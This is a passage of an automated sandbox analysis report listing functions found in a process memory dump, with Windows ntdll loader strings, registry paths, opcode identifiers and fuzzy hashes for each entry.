                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                                                                                                                                        • API String ID: 0-4274184382
                                                                                                                                                                                                        • Opcode ID: 336c5b589fb3c1a640ac14a37c4d77b80323cbdcb0992a166b79e51254fe86c2
                                                                                                                                                                                                        • Instruction ID: ddad457811d204251bf7fc8d479e746d8668fdb7e7e4bea2d5ba430fd0207cc3
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 336c5b589fb3c1a640ac14a37c4d77b80323cbdcb0992a166b79e51254fe86c2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7B416CB5A00209AFDB15DFA9DC45BADBBF5FF58704F084129E906E7255D734AA00CF90
                                                                                                                                                                                                        Function 018843D5 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01884508
                                                                                                                                                                                                        • LdrpCheckRedirection, xrefs: 0188450F
                                                                                                                                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01884519
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                                        • API String ID: 0-3154609507
                                                                                                                                                                                                        • Opcode ID: 125af2986c63260ba46a9bd060ba00bec8ee6a0dcfd87761703f18513d28cd2b
                                                                                                                                                                                                        • Instruction ID: d5478d013255d3b1cb014cc3b39755dafd40b7d5c0b12c1d3f3ea6602c5009a7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 125af2986c63260ba46a9bd060ba00bec8ee6a0dcfd87761703f18513d28cd2b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: DD41D2336066139BCB21EF5CD880B26BBE4AF48754B0A066DFD58D7256E730EA00CB91
                                                                                                                                                                                                        Function 018332C0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • Actx , xrefs: 018332CC
                                                                                                                                                                                                        • RtlCreateActivationContext, xrefs: 01872803
                                                                                                                                                                                                        • SXS: %s() passed the empty activation context data, xrefs: 01872808
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                                                                                                                                        • API String ID: 0-859632880
                                                                                                                                                                                                        • Opcode ID: b22668953249d461f37673a50851e7cd58328f69167a165f44232efb3fb95941
                                                                                                                                                                                                        • Instruction ID: 6560a4185dbc94aab61cd351861a6550d69ad9ac51d80983a5c479cbbeb9884c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b22668953249d461f37673a50851e7cd58328f69167a165f44232efb3fb95941
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3D312372601209ABEB16DE58D890F9A7BE5FB94714F148428FD05DF382CB71DA45CBD0
                                                                                                                                                                                                        Function 0188B214 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 0188B2B2
                                                                                                                                                                                                        • @, xrefs: 0188B2F0
                                                                                                                                                                                                        • GlobalFlag, xrefs: 0188B30F
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                                                                                                                                        • API String ID: 0-4192008846
                                                                                                                                                                                                        • Opcode ID: fa9b7d87cd77c95c493a9843c75faa9dbc833784f572b76ffa7f6c79c66c5e74
                                                                                                                                                                                                        • Instruction ID: cd905a45ffc16733c46da89ab747e586bb3ade95366697c241b8eeb19654a6b1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa9b7d87cd77c95c493a9843c75faa9dbc833784f572b76ffa7f6c79c66c5e74
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C7313AB1A0020DAFDB10EF98DC84AEEBBBCEF54744F440469EA01EB241D7749F048BA4
                                                                                                                                                                                                        Function 01831527 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • LdrpInitializeTls, xrefs: 01871851
                                                                                                                                                                                                        • minkernel\ntdll\ldrtls.c, xrefs: 0187185B
                                                                                                                                                                                                        • DLL "%wZ" has TLS information at %p, xrefs: 0187184A
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                                                                                                                                        • API String ID: 0-931879808
                                                                                                                                                                                                        • Opcode ID: 80ff20dfb4f278f751d630c1a4784620354e19a959acc169a0265f4b55f39c1d
                                                                                                                                                                                                        • Instruction ID: 2a3ca6832a20beacc56d0b7e1e5735bbfb0d83dfcbdeb99c4964ca9504138b0d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 80ff20dfb4f278f751d630c1a4784620354e19a959acc169a0265f4b55f39c1d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F131F671A40205EBD7209B59CC89F6A7AA8FB94B54F09012DF606E71C0D770EF048BE0
                                                                                                                                                                                                        Function 01841190 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0184119B
                                                                                                                                                                                                        • BuildLabEx, xrefs: 0184122F
                                                                                                                                                                                                        • @, xrefs: 018411C5
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                                                                                        • API String ID: 0-3051831665
                                                                                                                                                                                                        • Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                                                                                                                                        • Instruction ID: 687fb164a1040cf195f0319503e52db39022ab9c06b8d0ef1908a4cecb449ab3
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D53184B290061EBBDB11EB98DC44EAEBB7DEB94764F004025FA14E7250DB30DB458B91
                                                                                                                                                                                                        Function 018151C0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: @$@
                                                                                                                                                                                                        • API String ID: 0-149943524
                                                                                                                                                                                                        • Opcode ID: 548e6fedd83e0fa9db1cd71f82f89da5da8e04187ba401b9ddfbcb5e8c11f3d2
                                                                                                                                                                                                        • Instruction ID: 191c0b9d19561370a92b5bd05744b16ee854a6bd4818c865611abe324dbac050
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 548e6fedd83e0fa9db1cd71f82f89da5da8e04187ba401b9ddfbcb5e8c11f3d2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7D328B725083518BD7248F19C480B7EBBE9EFCA714F14492EFA95C7294E734DA44CB92
                                                                                                                                                                                                        Function 0188174B Relevance: 2.8, Strings: 2, Instructions: 278COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: @$AddD
                                                                                                                                                                                                        • API String ID: 0-2525844869
                                                                                                                                                                                                        • Opcode ID: e13a9bf736856d57572a961531b70e9fb47484b39e836332884305fc5276de84
                                                                                                                                                                                                        • Instruction ID: c352456bc5d7464e5c6b786dcf9ff6ab7e924ddc4d200d55688a266463b56db7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e13a9bf736856d57572a961531b70e9fb47484b39e836332884305fc5276de84
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 65A16F72108345AFE315DF14C849F6BBBE9FB84714F144A2EFA94C6154EB70EA06CB52
                                                                                                                                                                                                        Function 0187E372 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID: Legacy$UEFI
                                                                                                                                                                                                        • API String ID: 2994545307-634100481
                                                                                                                                                                                                        • Opcode ID: f6c69845c17fb7fe3743f52fe51d34d78f131539b7d636534492f127d03e4f2d
                                                                                                                                                                                                        • Instruction ID: 3ec7f6bdf5edbfaa6aba5871eaf73800df7b1c71e2ac3d8bcf9fb82613940872
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f6c69845c17fb7fe3743f52fe51d34d78f131539b7d636534492f127d03e4f2d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 70614D71A4061D9FDB25DFA8C880BADBBF9FB48704F14406DE649EB251E730EA40CB50
                                                                                                                                                                                                        Function 018DB55F Relevance: 2.7, Strings: 2, Instructions: 168COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • RedirectedKey, xrefs: 018DB60E
                                                                                                                                                                                                        • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 018DB5C4
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                                                                                                                                                        • API String ID: 0-1388552009
                                                                                                                                                                                                        • Opcode ID: 61daa475985bf2cf43af13ec345b3bb20a089e764fc46d442624285293f60139
                                                                                                                                                                                                        • Instruction ID: c64fd9be9f8b63dad1fbb87b0bcfb39ae5a07b12649db55b61fb1577f2ea0363
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 61daa475985bf2cf43af13ec345b3bb20a089e764fc46d442624285293f60139
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 536106B5C0121DEBDB21DF94C889ADEBFB8FB09714F15806AE505E7204DB349A45CF90
                                                                                                                                                                                                        Function 01800485 Relevance: 2.6, Strings: 2, Instructions: 135COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • kLsE, xrefs: 018005FE
                                                                                                                                                                                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 01800586
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                                                                        • API String ID: 0-2547482624
                                                                                                                                                                                                        • Opcode ID: 3b53f9e6411c3cf22995e9cb9450c5f3d661641c7f02616029565a1f782e1641
                                                                                                                                                                                                        • Instruction ID: 48da97aa72ac858a2fe5a820ed1e4a33d557703ec30ba7abd52b696f43808f5e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3b53f9e6411c3cf22995e9cb9450c5f3d661641c7f02616029565a1f782e1641
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A651BC71A0074E9FDBA6DFA8C8407AAB7F4AF04344F10453EF69AD3281E6359744CB62
                                                                                                                                                                                                        Function 0180A1E3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 0180A21B
                                                                                                                                                                                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 0180A229
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                                                                        • API String ID: 0-2876891731
                                                                                                                                                                                                        • Opcode ID: 37844f7603cf10b583242b1627fcfaa5606cbdb741875e7c826b263f322ea668
                                                                                                                                                                                                        • Instruction ID: 54934c67a4e02783b8c5310494b8c54b16aaa9e0c45ecdde73dfaad9f1434d7b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 37844f7603cf10b583242b1627fcfaa5606cbdb741875e7c826b263f322ea668
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7D41CC31A00759DBEB1ADF9DC840B6ABBB9FF85754F1440A5ED00DB2A1E636DB00CB11
                                                                                                                                                                                                        Function 0189314A Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                                                                                                                                        • API String ID: 0-118005554
                                                                                                                                                                                                        • Opcode ID: 9cb68183d93e6023c184e3beb4f67c298cb0ea06e2a63499c96cd23b1e5172f7
                                                                                                                                                                                                        • Instruction ID: 70bc58e03db3a3cb817ec84e5b9bee5fc60275c1a33dc28280dc7c078572f8fe
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9cb68183d93e6023c184e3beb4f67c298cb0ea06e2a63499c96cd23b1e5172f7
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 133190312087419BE715DBADD844B1ABBE8FF85714F0804A9FD64CB390EA31DA05C752
                                                                                                                                                                                                        Function 018331BE Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: .Local\$@
                                                                                                                                                                                                        • API String ID: 0-380025441
                                                                                                                                                                                                        • Opcode ID: 0489491388c2e0fd889703859aa5e1d494516bfb1935fa3a7761ee21d59674ab
                                                                                                                                                                                                        • Instruction ID: e812f1bb254b33d33786c84a0aebbc19094381bd74b04befdd947e379af4d692
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0489491388c2e0fd889703859aa5e1d494516bfb1935fa3a7761ee21d59674ab
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C7313872549305AFD721DF28C880A6BBBE8BBC5754F04092EF995C3251D634DE04CBD2
                                                                                                                                                                                                        Function 018333D0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 0187289F
                                                                                                                                                                                                        • RtlpInitializeAssemblyStorageMap, xrefs: 0187289A
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                                                                                                                                                        • API String ID: 0-2653619699
                                                                                                                                                                                                        • Opcode ID: 662c6d37d79150d116ac24c43fa6cc6c9d851c4839176ccebee38ec12a9c588a
                                                                                                                                                                                                        • Instruction ID: fa928ebd38c92b50e0962f50b9b061410e8aadb23011f515b236bdba17bc5323
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 662c6d37d79150d116ac24c43fa6cc6c9d851c4839176ccebee38ec12a9c588a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6211CA76B00205ABE7169A4D8D81F6A7AE9EBD4714F1884297E04DB244D675DF0143E1
                                                                                                                                                                                                        Function 0183A4F0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID: Cleanup Group$Threadpool!
                                                                                                                                                                                                        • API String ID: 2994545307-4008356553
                                                                                                                                                                                                        • Opcode ID: 4c110da9cdcb43aa43e4a832c5c9abe730893dccbbda8399d7d61754fc7ad8ba
                                                                                                                                                                                                        • Instruction ID: 542c0f6a9a9ade03cd1a96f39dd79b32a940322ad42da93551baa4e842edadce
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4c110da9cdcb43aa43e4a832c5c9abe730893dccbbda8399d7d61754fc7ad8ba
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BE01D1B2254704AFD315DF54CD05F2277F8EB80B15F048939B698C75A0E738DA00CB86
                                                                                                                                                                                                        Function 0183A580 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: GlobalTags
                                                                                                                                                                                                        • API String ID: 0-1106856819
                                                                                                                                                                                                        • Opcode ID: a944abc0688e34cf249a073d0b6fc15d9e8b12cfff97673d824a4230bd5d2cc2
                                                                                                                                                                                                        • Instruction ID: 6245f5211e50c7f54938d0406caaea20f8e0aa500fdc9f303ca817b6daf9b4dd
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a944abc0688e34cf249a073d0b6fc15d9e8b12cfff97673d824a4230bd5d2cc2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 84716D75E0061A9FEF28DF9CC580AEDBBB2BF48714F24812EE905E7245E7318A41DB50
                                                                                                                                                                                                        Function 018102F9 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: #%u
                                                                                                                                                                                                        • API String ID: 0-232158463
                                                                                                                                                                                                        • Opcode ID: 791369bc4e4ece2144678e1c6d6438e09575f361c6c275061e647bbf92163b23
                                                                                                                                                                                                        • Instruction ID: 8c1304d9ca0e48f623cd6954dc6b3814954587697f35981f14638084b764a759
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 791369bc4e4ece2144678e1c6d6438e09575f361c6c275061e647bbf92163b23
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A0714A72A0010A9FDB15DFA9D984BAEBBFCFF18704F144065E901E7255EA34EA41CB61
                                                                                                                                                                                                        Function 0188F42F Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                        • API String ID: 0-2766056989
                                                                                                                                                                                                        • Opcode ID: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
                                                                                                                                                                                                        • Instruction ID: cbd1d489e0c9ddf2d97b005916ec629b06008f2468d591393068fc7c9a2f951e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A3517D72504746AFE721EF58C940F6BB7E8FF94714F100929BA41D7290DB75EA04CBA2
                                                                                                                                                                                                        Function 0181E547 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: EXT-
                                                                                                                                                                                                        • API String ID: 0-1948896318
                                                                                                                                                                                                        • Opcode ID: 6a44b54c4b46efd22db61baef2e10d75aaf635ca6d7a0fa841276fa219e48167
                                                                                                                                                                                                        • Instruction ID: baccc4d9ca61ca0160d16f41021494c211bf0965e32c7b191831b7df6260403f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6a44b54c4b46efd22db61baef2e10d75aaf635ca6d7a0fa841276fa219e48167
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6941A0735083169BD722DA69C844B6BB7ECAF88B18F440E2DFA84D7184E674DB04C793
                                                                                                                                                                                                        Function 018341BB Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                        • API String ID: 0-2766056989
                                                                                                                                                                                                        • Opcode ID: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
                                                                                                                                                                                                        • Instruction ID: 81cc4116b39e450579aec0c2477f5dca0ca3b35a39ecaecf9f139c649929af16
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6C516A725047119BC320DF59C841A6BBBE9FF88710F00892AFA95D76A1E774EA04CB92
                                                                                                                                                                                                        Function 0187C3B0 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: BinaryHash
                                                                                                                                                                                                        • API String ID: 0-2202222882
